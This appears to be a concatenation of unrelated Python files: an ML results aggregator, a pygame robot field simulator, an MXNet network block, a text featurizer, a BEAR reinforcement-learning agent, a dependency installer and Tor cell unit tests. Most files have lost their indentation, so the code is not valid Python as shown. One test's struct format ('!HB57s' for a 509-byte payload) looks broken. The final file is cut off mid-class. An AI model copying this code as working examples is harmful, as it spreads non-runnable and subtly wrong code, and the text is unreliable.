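    OBJECT_FIELDS = {
        'Address': ['address_value'],
        'EmailMessage': ['header.to', 'header.subject'],
    }
    # Restrict Address observables to IPv4 addresses.
    OBJECT_CONSTRAINTS = {
        'Address': {'category': ['ipv4-addr']},
    }
    # Only exact-match style string conditions are supported.
    STRING_CONDITION_CONSTRAINT = ['None', 'Equals']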
|
412197
|
from WorkSpace import *
import matplotlib.pyplot as plt
import statistics
import pickle
import pandas as pd
import numpy as np
class Results:
def __init__(self,lr_method,evaluation_config,meta_methods=None,
architecture='FCRN'):
self.architecture = architecture
self.lr_method = lr_method
self.evaluation_config = evaluation_config
self.meta_methods = meta_methods
self.prefix = os.getcwd()+'/Logging/{}/{}/'
self.wrkspace = ManageWorkSpace(datasets=self.evaluation_config['targets'])
def calc_avg_iou_selections(self,meta_method=None,iou_result_path_prefix=None,
experiment_name=None):
self.wrkspace.create_dir([iou_result_path_prefix + 'CSV/'])
shots = [str(shot)+' shots' for shot in self.evaluation_config['k-shot']]
shots = ['']+shots
iou_list_avg = []
std_iou_avg = []
iou_list_avg.append(shots)
std_iou_avg.append(shots)
for test in self.evaluation_config['targets']:
row_iou = []
std_row_iou = []
row_iou.append(test)
std_row_iou.append(test)
for shot in self.evaluation_config['k-shot']:
iou_result_path = iou_result_path_prefix+str(shot)+'-shot/'+meta_method+\
'/Target_'+test+'/Test_Loss_IoU/' if meta_method!=None else iou_result_path_prefix+str(shot)+'-shot/Target_'+\
test+'/Test_Loss_IoU/'
row_iou_shot_num = []
for selection in self.evaluation_config['selections']:
experiment_name_selection = experiment_name+'_'+str(shot)+'shot_'+test\
+'_Selection_' + str(selection)
try:
f = open(iou_result_path + experiment_name_selection + '.pickle', 'rb')
except FileNotFoundError:
experiment_name_selection = experiment_name + str(shot) + 'shot_' + test \
+ '_Selection_' + str(selection)
f = open(iou_result_path + experiment_name_selection + '.pickle', 'rb')
test_result = pickle.load(f)
iou = test_result[1]
else:
test_result = pickle.load(f)
iou = test_result[1]
f.close()
row_iou_shot_num.append(iou)
temp = [elem for elem in row_iou_shot_num]
std_row_iou.append(round(statistics.stdev(temp), 3))
row_iou.append(sum(row_iou_shot_num) / len(self.evaluation_config['selections']))
iou_list_avg.append(row_iou)
std_iou_avg.append(std_row_iou)
df = pd.DataFrame(iou_list_avg)
df_std = pd.DataFrame(std_iou_avg)
csvFileName = iou_result_path_prefix + 'CSV/'+experiment_name+'_'+meta_method+'.csv' \
if meta_method!=None else iou_result_path_prefix + 'CSV/'+experiment_name+'_.csv'
f = open(csvFileName, 'w')
with f:
df.to_csv(f, header=False, index=False)
df_std.to_csv(f, header=False, index=False)
f.close()
return iou_list_avg,std_iou_avg
def calc_avg_iou_datasets(self,iou, num_datasets):
iou_temp = []
for row in iou[1:]:
temp = row[1:]
iou_temp.append(temp)
iou_temp = np.asarray(iou_temp)
iou_sum = []
for c in range(iou_temp.shape[1]):
temp = []
for r in range(iou_temp.shape[0]):
temp.append(iou_temp[r][c])
iou_sum.append(np.sum(temp) / num_datasets)
return iou_sum
def calc_avg_iou_selections_meta(self,experiment_name = ''):
prefix = self.prefix.format(self.wrkspace.map_dict[self.lr_method],self.architecture)
iou_result_path_prefix = prefix+'Fine-tuned'+'/'
for i,meta_method in enumerate(self.meta_methods,0):
iou_avg_selections, std_avg_selections = self.calc_avg_iou_selections(meta_method,iou_result_path_prefix=iou_result_path_prefix,
experiment_name=experiment_name)
print(iou_avg_selections)
print(std_avg_selections)
def calc_avg_iou_selections_transfer(self,experiment_name=''):
prefix = self.prefix.format(self.wrkspace.map_dict[self.lr_method],self.architecture)
iou_result_path_prefix =prefix+'Fine-tuned/'
iou_avg_selections, std_avg_selections = self.calc_avg_iou_selections(iou_result_path_prefix=iou_result_path_prefix,
experiment_name=experiment_name)
print(iou_avg_selections)
print(std_avg_selections)
if __name__ == '__main__':
evaluation_config = {'targets': ['B5'],
'selections': [1,2,3,4,5,6,7,8,9,10],
'k-shot': [1,3,5,7,10]}
experiment_name = 'Meta_Learning_finetuned_1.0meta_lr_700meta_epochs_0.001model_lr_30inner_epochs_5shottest_20_ft_epochs_0.0001ft_lr'
fig_name_prefix = experiment_name+'_'+str(len(evaluation_config['selections']))+'_selections_'
lr_method = 'Meta_Learning'
meta_methods = ['BCE']
results = Results(lr_method=lr_method,evaluation_config=evaluation_config,
meta_methods=meta_methods,architecture='UNet')
if lr_method == 'Meta_Learning':
results.calc_avg_iou_selections_meta(experiment_name=experiment_name)
else:
results.calc_avg_iou_selections_transfer(experiment_name=experiment_name)
|
412217
|
import pygame
from networktables import NetworkTables
import math
print("Starting fieldsim")
# Init pygame
pygame.init()
gameDisplay = pygame.display.set_mode((1228,635))
pygame.display.set_caption('5024 Fieldsim')
clock = pygame.time.Clock()
# Init NT
NetworkTables.initialize(server='localhost')
sd = NetworkTables.getTable('SmartDashboard')
# Colors
blue = (0,0,180)
grey = (98,98,98)
white = (255,255,255)
# Robot size
rbt_size = (60,60)
rbt = pygame.Surface(rbt_size)
# Others
distance_mul = round(1228 / 16) # Image width / approx. field width (meters)
width_stretch = 0.89
# image loading
field_base = pygame.image.load("images/2020field-base.png")
field_top = pygame.image.load("images/2020field-top.png").convert_alpha()
rbt_surf = pygame.image.load("images/robot-sprite.png").convert_alpha()
rbt_surf = pygame.transform.scale(rbt_surf, rbt_size)
def getRobotPosition() -> tuple:
rbt_position = sd.getString("[DriveTrain] pose", "None").split(" ")
print(rbt_position)
if rbt_position[0] == "None":
return (100,0,45)
x = float(rbt_position[1][:-1])
y = float(rbt_position[3][:-2])
theta = float(rbt_position[-1][:-2])
return (x * distance_mul,y*distance_mul * width_stretch, theta)
def drawRegularPolygon(surface, color, theta, x, y, w,h):
x -= w/2
y -= h/2
hw = w/2
hh = h/2
# Rect points
points = [
(-hw,-hh),
(hw,-hh),
(hw,hh),
(-hw,hh)
]
rotated_point = [pygame.math.Vector2(p).rotate(theta) for p in points]
vCenter = pygame.math.Vector2((x, y))
rect_points = [(vCenter + p) for p in rotated_point]
pygame.draw.polygon(surface, color, rect_points)
def drawRobot(x,y,theta):
rbt = pygame.transform.rotate(rbt_surf, -theta)
gameDisplay.blit(rbt, (x - (rbt.get_width() / 2),y - (rbt.get_height() / 2)))
while True:
# Handle window close
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
quit()
# Clear the frame
gameDisplay.fill(white)
# Draw the field
gameDisplay.blit(field_base, (0,0))
# Draw the "robot"
x,y,theta = getRobotPosition()
# Shift position to match real field positioning
y += (635/2)
x += (60 + rbt_size[1] / 2)
# Draw the robot
drawRobot(x,y,theta)
# Add top of field
gameDisplay.blit(field_top, (0,0))
# Update the screen
pygame.display.update()
clock.tick(60)
pygame.quit()
quit()
|
412233
|
import mxnet as mx
from symbol_basic import *
# - - - - - - - - - - - - - - - - - - - - - - -
# Standard Dual Path Unit
def DualPathFactory(data, num_1x1_a, num_3x3_b, num_1x1_c, name, inc, G, _type='normal'):
kw = 3
kh = 3
pw = (kw-1)//2
ph = (kh-1)//2
# type
if _type == 'proj':
key_stride = 1
has_proj = True
if _type == 'down':
key_stride = 2
has_proj = True
if _type == 'normal':
key_stride = 1
has_proj = False
# PROJ
if type(data) is list:
data_in = mx.symbol.Concat(*[data[0], data[1]], name=('%s_cat-input' % name))
else:
data_in = data
if has_proj:
c1x1_w = BN_AC_Conv( data=data_in, num_filter=(num_1x1_c+2*inc), kernel=( 1, 1), stride=(key_stride, key_stride), name=('%s_c1x1-w(s/%d)' %(name, key_stride)), pad=(0, 0))
data_o1 = mx.symbol.slice_axis(data=c1x1_w, axis=1, begin=0, end=num_1x1_c, name=('%s_c1x1-w(s/%d)-split1' %(name, key_stride)))
data_o2 = mx.symbol.slice_axis(data=c1x1_w, axis=1, begin=num_1x1_c, end=(num_1x1_c+2*inc), name=('%s_c1x1-w(s/%d)-split2' %(name, key_stride)))
else:
data_o1 = data[0]
data_o2 = data[1]
# MAIN
c1x1_a = BN_AC_Conv( data=data_in, num_filter=num_1x1_a, kernel=( 1, 1), pad=( 0, 0), name=('%s_c1x1-a' % name))
c3x3_b = BN_AC_Conv( data=c1x1_a, num_filter=num_3x3_b, kernel=(kw, kh), pad=(pw, ph), name=('%s_c%dx%d-b' % (name,kw,kh)), stride=(key_stride,key_stride), num_group=G)
c1x1_c = BN_AC_Conv( data=c3x3_b, num_filter=(num_1x1_c+inc), kernel=( 1, 1), pad=( 0, 0), name=('%s_c1x1-c' % name))
c1x1_c1= mx.symbol.slice_axis(data=c1x1_c, axis=1, begin=0, end=num_1x1_c, name=('%s_c1x1-c-split1' % name))
c1x1_c2= mx.symbol.slice_axis(data=c1x1_c, axis=1, begin=num_1x1_c, end=(num_1x1_c+inc), name=('%s_c1x1-c-split2' % name))
# OUTPUTS
summ = mx.symbol.ElementWiseSum(*[data_o1, c1x1_c1], name=('%s_sum' % name))
dense = mx.symbol.Concat( *[data_o2, c1x1_c2], name=('%s_cat' % name))
return [summ, dense]
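# Minimal usage sketch (not part of the original file): chains two Dual Path
# Units the way a DPN stage would. The filter counts, increment and cardinality
# below are illustrative values only, not taken from a specific DPN config.
if __name__ == '__main__':
    data = mx.symbol.Variable('data')
    # The first unit of a stage projects its input ('proj' or 'down'); the
    # following units consume and extend the [residual, dense] pair ('normal').
    unit1 = DualPathFactory(data, 96, 96, 256, name='conv2_1', inc=16, G=32, _type='proj')
    unit2 = DualPathFactory(unit1, 96, 96, 256, name='conv2_2', inc=16, G=32, _type='normal')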
|
412242
|
class TextFeaturizer(object):
"""文本特征器,用于处理或从文本中提取特征。支持字符级的令牌化和转换为令牌索引列表
:param vocab_filepath: 令牌索引转换词汇表的文件路径
:type vocab_filepath: str
"""
def __init__(self, vocab_filepath):
self._vocab_dict, self._vocab_list = self._load_vocabulary_from_file(
vocab_filepath)
def featurize(self, text):
"""将文本字符串转换为字符级的令牌索引列表
:param text: 文本
:type text: str
:return:字符级令牌索引列表
:rtype: list
"""
tokens = self._char_tokenize(text)
token_indices = []
for token in tokens:
# Skip characters that are not in the vocabulary
if token not in self._vocab_list: continue
token_indices.append(self._vocab_dict[token])
return token_indices
@property
def vocab_size(self):
"""返回词汇表大小
:return: Vocabulary size.
:rtype: int
"""
return len(self._vocab_list)
@property
def vocab_list(self):
"""返回词汇表的列表
:return: Vocabulary in list.
:rtype: list
"""
return self._vocab_list
def _char_tokenize(self, text):
"""Character tokenizer."""
return list(text.strip())
def _load_vocabulary_from_file(self, vocab_filepath):
"""Load vocabulary from file."""
vocab_lines = []
with open(vocab_filepath, 'r', encoding='utf-8') as file:
vocab_lines.extend(file.readlines())
vocab_list = [line.split('\t')[0].replace('\n', '') for line in vocab_lines]
vocab_dict = dict(
[(token, id) for (id, token) in enumerate(vocab_list)])
return vocab_dict, vocab_list
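# Minimal usage sketch (not part of the original module): builds a throwaway
# vocabulary file (one token per line; only the first tab-separated column is
# read) and featurizes a short string. File name and tokens are hypothetical.
if __name__ == '__main__':
    import os
    import tempfile
    vocab_path = os.path.join(tempfile.gettempdir(), 'demo_vocab.txt')
    with open(vocab_path, 'w', encoding='utf-8') as f:
        f.write('\n'.join(['h', 'e', 'l', 'o', ' ', 'w', 'r', 'd']))
    featurizer = TextFeaturizer(vocab_path)
    print(featurizer.featurize('hello world'))  # [0, 1, 2, 2, 3, 4, 5, 3, 6, 2, 7]
    os.remove(vocab_path)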
|
412468
|
class Solution:
def newInteger(self, n):
base9 = ""
while n:
base9 += str(n % 9)
n //= 9
return int(base9[::-1])
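# Worked example (sketch, not part of the original solution), assuming the
# usual reading of this problem: the n-th positive integer without the digit 9
# is n re-encoded in base 9, e.g. newInteger(9) == 10 and newInteger(10) == 11.
if __name__ == '__main__':
    s = Solution()
    assert s.newInteger(9) == 10
    assert s.newInteger(10) == 11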
|
412474
|
import os
import torch
import numpy as np
from torch.distributions.normal import Normal
from torch.nn.functional import mse_loss
from copy import deepcopy
from rlil.environments import State, action_decorator, Action
from rlil.initializer import get_writer, get_device, get_replay_buffer
from rlil import nn
from .base import Agent, LazyAgent
class BEAR(Agent):
"""
Bootstrapping error accumulation reduction (BEAR)
BEAR is an algorithm to train an agent from a fixed batch.
Unlike BCQ, BEAR doesn't constraint the distribution of the
learned policy to be close to the behavior policy.
Instead, BEAR restricts the policy to ensure that the actions of
the policy lies in the support of the training distribution.
https://arxiv.org/abs/1906.00949
This implementation is based on: https://github.com/aviralkumar2907/BEAR
Args:
qs (EnsembleQContinuous): An Approximation of the continuous action Q-functions.
encoder (BcqEncoder): An approximation of the encoder.
decoder (BcqDecoder): An approximation of the decoder.
policy (SoftDeterministicPolicy): An Approximation of a soft deterministic policy.
kernel_type: ("gaussian"|"laplacian") Kernel type used for computation of MMD
num_samples_match (int): Number of samples used for computing sampled MMD
mmd_sigma (float): Parameter for computation of MMD.
discount_factor (float): Discount factor for future rewards.
minibatch_size (int): The number of experiences to sample in each training update.
lambda_q (float): Weight for soft clipped double q-learning
_lambda (float): Weight for actor loss with mmd
"""
def __init__(self,
qs,
encoder,
decoder,
policy,
kernel_type="laplacian",
num_samples_match=5,
mmd_sigma=10.0,
discount_factor=0.99,
lambda_q=0.75,
_lambda=0.4,
delta_conf=0.1,
minibatch_size=32,
):
# objects
self.qs = qs
self.encoder = encoder
self.decoder = decoder
self.policy = policy
self.replay_buffer = get_replay_buffer()
self.device = get_device()
self.writer = get_writer()
# hyperparameters
self.kernel_type = kernel_type
self.mmd_sigma = mmd_sigma
self.num_samples_match = num_samples_match
self.minibatch_size = minibatch_size
self.discount_factor = discount_factor
self.lambda_q = lambda_q
self._lambda = _lambda
self.delta_conf = delta_conf
# lagrange multipliers for maintaining support matching at all times
self.log_lagrange2 = torch.randn(
(), requires_grad=True, device=self.device)
self.lagrange2_opt = torch.optim.Adam([self.log_lagrange2, ], lr=1e-3)
# private
self._train_count = 0
def act(self, states, rewards):
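# BEAR/BCQ-style action selection: tile the current state, sample several
# candidate actions from the policy and execute the candidate with the
# highest value under the first Q-network.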
with torch.no_grad():
states = State(states.features.repeat(10, 1).to(self.device))
policy_actions = Action(self.policy.no_grad(states)[0])
q1_values = self.qs.q1(states, policy_actions)
ind = q1_values.argmax(0).item()
return policy_actions[ind].to("cpu")
def train(self):
self._train_count += 1
# sample transitions from buffer
(states, actions, rewards,
next_states, _, _) = self.replay_buffer.sample(self.minibatch_size)
# Train the Behaviour cloning policy to be able to
# take more than 1 sample for MMD
mean, log_var = self.encoder(
states.to(self.device), actions.to(self.device))
z = mean + (0.5 * log_var).exp() * torch.randn_like(log_var)
vae_actions = Action(self.decoder(states, z))
vae_mse = mse_loss(actions.features, vae_actions.features)
vae_kl = nn.kl_loss_vae(mean, log_var)
vae_loss = (vae_mse + 0.5 * vae_kl)
self.decoder.reinforce(vae_loss)
self.encoder.reinforce()
self.writer.add_scalar('loss/vae/mse', vae_mse.detach())
self.writer.add_scalar('loss/vae/kl', vae_kl.detach())
# train critic
with torch.no_grad():
# Duplicate next state 10 times
next_states_10 = State(torch.repeat_interleave(
next_states.features, 10, 0).to(self.device))
# Compute value of perturbed actions sampled from the VAE
next_vae_actions_10 = Action(self.decoder(next_states_10))
next_actions_10 = Action(
self.policy.target(next_states_10, next_vae_actions_10))
# (batch x 10) x num_q
qs_targets = self.qs.target(next_states_10, next_actions_10)
# Soft Clipped Double Q-learning
# (batch x 10) x 1
q_targets = self.lambda_q * qs_targets.min(1)[0] \
+ (1. - self.lambda_q) * qs_targets.max(1)[0]
# Take max over each action sampled from the VAE
# batch x 1
q_targets = q_targets.reshape(
self.minibatch_size, -1).max(1)[0].reshape(-1, 1)
q_targets = rewards.reshape(-1, 1) + \
self.discount_factor * q_targets * \
next_states.mask.float().reshape(-1, 1)
current_qs = self.qs(states, actions) # batch x num_q
repeated_q_targets = torch.repeat_interleave(
q_targets, current_qs.shape[1], 1)
q_loss = mse_loss(current_qs, repeated_q_targets)
self.qs.reinforce(q_loss)
# train policy
# batch x num_samples_match x d
vae_actions, raw_vae_actions = \
self.decoder.decode_multiple(states, self.num_samples_match)
actor_actions, raw_actor_actions = \
self.policy.sample_multiple(states, self.num_samples_match)
if self.kernel_type == 'gaussian':
mmd = nn.mmd_gaussian(
raw_vae_actions, raw_actor_actions, sigma=self.mmd_sigma)
else:
mmd = nn.mmd_laplacian(
raw_vae_actions, raw_actor_actions, sigma=self.mmd_sigma)
# Update through TD3 style
# (batch x num_samples_match) x d
repeated_states = torch.repeat_interleave(
states.features.unsqueeze(1),
self.num_samples_match, 1).view(-1, states.shape[1])
repeated_actions = \
actor_actions.contiguous().view(-1, actor_actions.shape[2])
# (batch x num_samples_match) x num_q
critic_qs = self.qs(State(repeated_states), Action(repeated_actions))
# batch x num_samples_match x num_q
critic_qs = \
critic_qs.view(-1, self.num_samples_match, critic_qs.shape[1])
critic_qs = critic_qs.mean(1) # batch x num_q
std_q = torch.std(critic_qs, dim=-1, keepdim=False,
unbiased=False) # batch
critic_qs = critic_qs.min(1)[0] # batch
# Do support matching with a warmstart which happens to be reasonable
# around epoch 20 during training
if self._train_count >= 20:
actor_loss = (-critic_qs + self._lambda *
(np.sqrt((1 - self.delta_conf) / self.delta_conf)) *
std_q + self.log_lagrange2.exp().detach() * mmd).mean()
else:
actor_loss = (self.log_lagrange2.exp() * mmd).mean()
std_loss = self._lambda * (np.sqrt((1 - self.delta_conf) /
self.delta_conf)) * std_q.detach().mean()
self.policy.reinforce(actor_loss)
# update lagrange multipliers
thresh = 0.05
lagrange_loss = (self.log_lagrange2.exp() *
(mmd - thresh).detach()).mean()
self.lagrange2_opt.zero_grad()
(-lagrange_loss).backward()
self.lagrange2_opt.step()
self.log_lagrange2.data.clamp_(min=-5.0, max=10.0)
self.writer.add_scalar('loss/mmd', mmd.detach().mean())
self.writer.add_scalar('loss/actor', actor_loss.detach())
self.writer.add_scalar('loss/qs', q_loss.detach())
self.writer.add_scalar('loss/std', std_loss.detach())
self.writer.add_scalar('loss/lagrange2', lagrange_loss.detach())
self.writer.add_scalar('critic_qs', critic_qs.detach().mean())
self.writer.add_scalar('std_q', std_q.detach().mean())
self.writer.add_scalar('lagrange2', self.log_lagrange2.exp().detach())
self.writer.train_steps += 1
def should_train(self):
return True
def make_lazy_agent(self, evaluation=False, store_samples=True):
policy_model = deepcopy(self.policy.model)
qs_model = deepcopy(self.qs.model)
return BearLazyAgent(policy_model.to("cpu"),
qs_model.to("cpu"),
evaluation=evaluation,
store_samples=store_samples)
def load(self, dirname):
for filename in os.listdir(dirname):
if filename == 'policy.pt':
self.policy.model = torch.load(os.path.join(
dirname, filename), map_location=self.device)
if filename == 'qs.pt':
self.qs.model = torch.load(os.path.join(dirname, filename),
map_location=self.device)
if filename == 'encoder.pt':
self.encoder.model = torch.load(os.path.join(dirname, filename),
map_location=self.device)
if filename == 'decoder.pt':
self.decoder.model = torch.load(os.path.join(dirname, filename),
map_location=self.device)
class BearLazyAgent(LazyAgent):
"""
Agent class for sampler.
"""
def __init__(self,
policy_model,
qs_model,
*args, **kwargs):
self._policy_model = policy_model
self._qs_model = qs_model
super().__init__(*args, **kwargs)
if self._evaluation:
self._policy_model.eval()
self._qs_model.eval()
def act(self, states, reward):
super().act(states, reward)
self._states = states
with torch.no_grad():
states = State(states.features.repeat(10, 1))
policy_actions = Action(self._policy_model(states)[0])
q1_values = self._qs_model.q1(states, policy_actions)
ind = q1_values.argmax(0).item()
self._actions = policy_actions[ind].to("cpu")
return self._actions
|
412524
|
import argparse
import subprocess
import glob
import re
import os
parser = argparse.ArgumentParser(description='Installing ThirdParty')
parser.add_argument('--all', help='install all dependencies',
action='store_true', default=True)
parser.add_argument('--reinstall_all', action='store_true',
help='re-install all dependencies', default=False)
parser.add_argument(
'--reinstall', help='reinstall one library', type=str, default="")
def install_all_deps():
subprocess.call("./thirdparty/rules/cmake.sh")
for rule in glob.glob("./thirdparty/rules/*.sh"):
subprocess.call("./" + rule, shell=True)
def reinstall_all_deps():
to_remove = str("./thirdparty/all/")
if os.path.exists(to_remove):
subprocess.call(str("rm -r " + to_remove), shell=True)
install_all_deps()
def reinstall_one_lib(lib):
all_rules = glob.glob("./thirdparty/rules/*.sh")
names = []
for rule in all_rules:
names.append(re.search('%s(.*)%s' %
('./thirdparty/rules/', '.sh'), rule).group(1))
if lib not in names:
print('Error no rules found for ' + lib)
else:
to_remove = str("./thirdparty/all/" + lib)
if os.path.exists(to_remove):
subprocess.call(str("rm -r " + to_remove), shell=True)
subprocess.call("./thirdparty/rules/" + lib + ".sh", shell=True)
args = parser.parse_args()
if args.reinstall != "":
reinstall_one_lib(args.reinstall)
elif args.reinstall_all:
reinstall_all_deps()
else:
install_all_deps()
|
412559
|
import struct
import unittest
from collections import OrderedDict
from oppy.cell.fixedlen import (
FixedLenCell,
Create2Cell,
Created2Cell,
CreatedFastCell,
CreatedCell,
CreateFastCell,
CreateCell,
DestroyCell,
EncryptedCell,
NetInfoCell,
PaddingCell,
)
from oppy.cell.util import TLVTriple
from oppy.tests.integration.cell.cellbase import FixedLenTestBase
CIRC_ID = 1
# Unit tests and constants for Create2Cell
CREATE2_CMD = 10
CREATE2_NTOR_HTYPE = 2
CREATE2_NTOR_HLEN = 84
CREATE2_NTOR_HDATA_DUMMY = "\x00" * CREATE2_NTOR_HLEN
create2_bytes_good = struct.pack(
"!HBHH{}s".format(CREATE2_NTOR_HLEN),
CIRC_ID, CREATE2_CMD,
CREATE2_NTOR_HTYPE, CREATE2_NTOR_HLEN, CREATE2_NTOR_HDATA_DUMMY,
)
create2_bytes_good_padded = FixedLenCell.padCellBytes(create2_bytes_good)
assert len(create2_bytes_good_padded) == 512
create2_parse_bad_htype = struct.pack(
"!HBHH{}s".format(CREATE2_NTOR_HLEN),
CIRC_ID, CREATE2_CMD,
# ntor should be 2
1, CREATE2_NTOR_HLEN, CREATE2_NTOR_HDATA_DUMMY,
)
create2_parse_bad_htype = FixedLenCell.padCellBytes(create2_parse_bad_htype)
assert len(create2_parse_bad_htype) == 512
create2_parse_bad_hlen = struct.pack(
"!HBHH{}s".format(CREATE2_NTOR_HLEN),
CIRC_ID, CREATE2_CMD,
# hlen should be 84 for ntor
CREATE2_NTOR_HTYPE, 83, CREATE2_NTOR_HDATA_DUMMY,
)
create2_parse_bad_hlen = FixedLenCell.padCellBytes(create2_parse_bad_hlen)
assert len(create2_parse_bad_hlen) == 512
# htype should be 2 for ntor
create2_make_bad_htype = (CIRC_ID, 1, CREATE2_NTOR_HLEN,
CREATE2_NTOR_HDATA_DUMMY)
# htype should be int not str
create2_make_bad_htype_2 = (CIRC_ID, str(CREATE2_NTOR_HTYPE),
CREATE2_NTOR_HLEN,
CREATE2_NTOR_HDATA_DUMMY)
# hlen should be 84 for ntor
create2_make_bad_hlen = (CIRC_ID, CREATE2_NTOR_HTYPE, 83,
CREATE2_NTOR_HDATA_DUMMY)
# len(hdata) == hlen must be true
create2_make_bad_hdata = (CIRC_ID, CREATE2_NTOR_HTYPE, CREATE2_NTOR_HLEN,
"\x00")
class Create2CellTests(FixedLenTestBase, unittest.TestCase):
# NOTE: Twisted unfortunately does not support `setUpClass()`, so we
# do actually need to call this before every test
def setUp(self):
self.cell_constants = {
'cell-bytes-good': create2_bytes_good_padded,
'cell-type': Create2Cell,
'cell-bytes-good-nopadding': create2_bytes_good,
}
self.cell_header = OrderedDict()
self.cell_header['circ_id'] = CIRC_ID
self.cell_header['cmd'] = CREATE2_CMD
self.cell_header['link_version'] = 3
self.cell_attributes = OrderedDict()
self.cell_attributes['htype'] = CREATE2_NTOR_HTYPE
self.cell_attributes['hlen'] = CREATE2_NTOR_HLEN
self.cell_attributes['hdata'] = CREATE2_NTOR_HDATA_DUMMY
self.bad_parse_inputs = (create2_parse_bad_htype,
create2_parse_bad_hlen)
self.bad_make_inputs = (create2_make_bad_htype,
create2_make_bad_htype_2,
create2_make_bad_hlen,
create2_make_bad_hdata)
self.encrypted = False
# Unit tests and constants for Created2Cell
# we can reuse most of the values from Create2Cell for some constants
CREATED2_CMD = 11
created2_bytes_good = struct.pack(
"!HBH{}s".format(CREATE2_NTOR_HLEN),
CIRC_ID, CREATED2_CMD,
CREATE2_NTOR_HLEN, CREATE2_NTOR_HDATA_DUMMY,
)
created2_bytes_good_padded = FixedLenCell.padCellBytes(created2_bytes_good)
assert len(created2_bytes_good_padded) == 512
created2_parse_bad_hlen = struct.pack(
"!HBH{}s".format(CREATE2_NTOR_HLEN),
CIRC_ID, CREATE2_CMD,
# hlen should be 84 for ntor
83, CREATE2_NTOR_HDATA_DUMMY,
)
created2_parse_bad_hlen = FixedLenCell.padCellBytes(created2_parse_bad_hlen)
assert len(created2_parse_bad_hlen) == 512
# hlen should be 84 for ntor
created2_make_bad_hlen = (CIRC_ID, 83, CREATE2_NTOR_HDATA_DUMMY)
# len(hdata) == hlen must be true
created2_make_bad_hdata = (CIRC_ID, CREATE2_NTOR_HLEN, "\x00")
class Created2CellTests(FixedLenTestBase, unittest.TestCase):
def setUp(self):
self.cell_constants = {
'cell-bytes-good': created2_bytes_good_padded,
'cell-type': Created2Cell,
'cell-bytes-good-nopadding': created2_bytes_good,
}
self.cell_header = OrderedDict()
self.cell_header['circ_id'] = CIRC_ID
self.cell_header['cmd'] = CREATED2_CMD
self.cell_header['link_version'] = 3
self.cell_attributes = OrderedDict()
self.cell_attributes['hlen'] = CREATE2_NTOR_HLEN
self.cell_attributes['hdata'] = CREATE2_NTOR_HDATA_DUMMY
self.bad_parse_inputs = (created2_parse_bad_hlen,)
self.bad_make_inputs = (created2_make_bad_hlen,
created2_make_bad_hdata,)
self.encrypted = False
# for unimplemented cells, just verify they fail when we try to create them
class CreatedFastCellTests(unittest.TestCase):
def test_init_fail(self):
self.assertRaises(NotImplementedError, CreatedFastCell, 'dummy')
class CreatedCellTests(unittest.TestCase):
def test_init_fail(self):
self.assertRaises(NotImplementedError, CreatedCell, 'dummy')
class CreateFastCellTests(unittest.TestCase):
def test_init_fail(self):
self.assertRaises(NotImplementedError, CreateFastCell, 'dummy')
class CreateCellTests(unittest.TestCase):
def test_init_fail(self):
self.assertRaises(NotImplementedError, CreateCell, 'dummy')
# Unit tests and constants for DestroyCell
DESTROY_CMD = 4
destroy_bytes_good = struct.pack(
"!HBB",
CIRC_ID, DESTROY_CMD,
0,
)
destroy_bytes_good_padded = FixedLenCell.padCellBytes(destroy_bytes_good)
assert len(destroy_bytes_good_padded) == 512
destroy_parse_bad_reason = struct.pack(
"!HBB",
CIRC_ID, DESTROY_CMD,
# 13 is not a valid reason
13,
)
destroy_parse_bad_reason = FixedLenCell.padCellBytes(destroy_parse_bad_reason)
assert len(destroy_parse_bad_reason) == 512
destroy_make_bad_reason = (CIRC_ID, 13)
encrypted_bytes_good = struct.pack(
"!HBB",
CIRC_ID, DESTROY_CMD,
0,
)
destroy_bytes_good_padded = FixedLenCell.padCellBytes(destroy_bytes_good)
assert len(destroy_bytes_good_padded) == 512
class DestroyCellTests(FixedLenTestBase, unittest.TestCase):
def setUp(self):
self.cell_constants = {
'cell-bytes-good': destroy_bytes_good_padded,
'cell-type': DestroyCell,
'cell-bytes-good-nopadding': destroy_bytes_good,
}
self.cell_header = OrderedDict()
self.cell_header['circ_id'] = CIRC_ID
self.cell_header['cmd'] = DESTROY_CMD
self.cell_header['link_version'] = 3
self.cell_attributes = OrderedDict()
self.cell_attributes['reason'] = 0
self.bad_parse_inputs = (destroy_parse_bad_reason,)
self.bad_make_inputs = (destroy_make_bad_reason,)
self.encrypted = False
# Unit tests and constants for EncryptedCell
# since the payload of an encrypted cell prior to decryption is, from oppy's
# perspective, just a black box, the only type of "bad" payload data is
# a payload passed to "make()" that is too large for a relay cell
RELAY_CMD = 3
encrypted_bytes_good = struct.pack(
"!HB57s",
CIRC_ID, RELAY_CMD,
"\x00" * 509,
)
encrypted_bytes_good_padded = FixedLenCell.padCellBytes(encrypted_bytes_good)
assert len(encrypted_bytes_good_padded) == 512
encrypted_make_bad_payload_len_long = (CIRC_ID, "\x00" * 510)
encrypted_make_bad_payload_len_short = (CIRC_ID, "\x00" * 508)
class EncryptedCellTests(FixedLenTestBase, unittest.TestCase):
def setUp(self):
self.cell_constants = {
'cell-bytes-good': encrypted_bytes_good_padded,
'cell-type': EncryptedCell,
'cell-bytes-good-nopadding': encrypted_bytes_good,
}
self.cell_header = OrderedDict()
self.cell_header['circ_id'] = CIRC_ID
self.cell_header['cmd'] = RELAY_CMD
self.cell_header['link_version'] = 3
self.cell_attributes = {'enc_payload': "\x00" * 509, }
self.bad_parse_inputs = ()
self.bad_make_inputs = (encrypted_make_bad_payload_len_long,
encrypted_make_bad_payload_len_short,)
self.encrypted = True
def test_getBytes_trimmed(self):
# encrypted cells don't know what's in their payload, so
# "trimmed" arg doesn't make sense for them
pass
# NetInfoCell (IPv4 type/length/value) unittests and constant values
NETINFO_CMD = 8
# IPv4 type type/length/value
netinfo_bytes_good = struct.pack(
'!HBIBB4sBBB4s',
CIRC_ID, NETINFO_CMD,
0, 4, 4, "\x7f\x00\x00\x01", # 127.0.0.1
1, 4, 4, "\x7f\x00\x00\x01",
)
netinfo_bytes_good_padded = FixedLenCell.padCellBytes(netinfo_bytes_good)
assert len(netinfo_bytes_good_padded) == 512
netinfo_parse_bad_num_addresses = netinfo_bytes_good_padded[:13]
netinfo_parse_bad_num_addresses += struct.pack('!B', 200)
netinfo_parse_bad_num_addresses += netinfo_bytes_good_padded[14:]
assert len(netinfo_parse_bad_num_addresses) == 512
netinfo_make_bad_num_addresses = (CIRC_ID, TLVTriple(u'127.0.0.1'),
[TLVTriple(u'127.0.0.1') for i in xrange(50)])
class NetInfoCellIPv4Tests(FixedLenTestBase, unittest.TestCase):
def setUp(self):
self.cell_constants = {
'cell-bytes-good': netinfo_bytes_good_padded,
